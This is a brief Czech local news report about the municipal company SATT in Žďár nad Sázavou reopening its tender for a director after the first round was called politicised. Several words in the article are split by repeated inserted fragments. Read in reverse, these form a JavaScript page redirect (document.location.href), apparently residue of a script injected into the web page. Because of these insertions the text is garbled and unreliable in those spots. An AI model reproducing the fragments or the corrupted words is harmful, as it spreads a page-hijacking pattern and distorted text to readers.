výběrové řízení
Rainbow page separator

SATT vyhlásil nové výběrové řízení

Sobota, 17. ledna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Do 10. února se mohou hlásit zájemci o post ředitele žďárské společnosti SATT; firma vyhlásila nové výběrové řízení. Uchazeči své přihlášky odevzdají buď osobně v sídle společnosti v Okružní ulici, případně je pošlou poš[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, anebo je dodají prostřednictvím da[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové schránky. Vybraní žadatelé budou pozváni k osobnímu pohovoru v termínu 18. února, předpokládaný nástup nového ředitele do funkce je plánován 1. května.

Novým výběrovým řízením představenstvo společnosti SATT vyhovělo žďárským radním, kteří doporučili řízení, jež bylo zahájeno před půl rokem, zrušit a následně jej zopakovat. Důvodem bylo podle jejich vyjádření zpolitizování [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to řízení.
Žďár nad Sázavou je většinovým akcionářem společnosti SATT a zástupci radnice rozhodnutí jeho představenstva o novém výběrovém řízení vítají. „Věřím, že nové řízení bude transparentní,“ uvedl starosta Žďáru nad Sázavou Zdeněk Navrátil.